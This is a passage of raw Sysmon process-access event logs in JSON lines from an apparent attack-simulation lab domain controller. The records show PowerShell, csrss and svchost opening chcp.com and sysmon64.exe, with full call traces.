2f0910c41e0ead\\System.Management.Automation.ni.dll+122dc04b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+11811a97|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+11811067","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","SourceProcessId":"3408","SourceThreadId":"2952","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-001099CA1100}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+12389e8b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182af65|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182ac36|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+122dc04b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+117eb7cc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+11849c9b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182d300|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182d300|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182d191|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1181f116|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182b649|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182b23c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182af65|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182ac36|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+122dc04b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+11811a97|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+11811067","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-001099CA1100}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-001099CA1100}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 